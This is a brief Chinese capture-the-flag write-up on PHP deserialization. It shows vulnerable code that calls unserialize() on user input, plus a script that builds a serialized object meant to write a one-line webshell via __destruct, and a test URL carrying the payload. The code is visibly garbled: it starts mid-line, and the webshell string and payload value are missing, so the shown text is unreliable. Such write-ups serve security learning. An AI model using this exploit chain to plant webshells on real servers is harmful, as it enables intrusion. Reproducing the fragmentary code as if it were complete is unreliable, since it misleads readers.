【CTF WEB】反序列化

反序列化

漏洞代码

var); 
        fclose($fb); 
    } 
} 

$class = $_GET['code']; 
$class_unser = unserialize($class); 
unset($class_unser); 
?> 

写一个php的脚本，执行得到一串序列化后字符串，生成的代码是不会在浏览器直接显示的，需要查看源码才能看到完整内容。

';//一句话木马
}
$a=new example();//顶替原来的example，从而执行destruct函数,所以名称还是要写成example
echo serialize($a);//输出序列化后的结果
?>

测试方法

http://218.2.197.236:26225/?code=O:7:"example":1:{s:3:"var";s:31:"";}

转载于:https://www.cnblogs.com/17bdw/p/9723387.html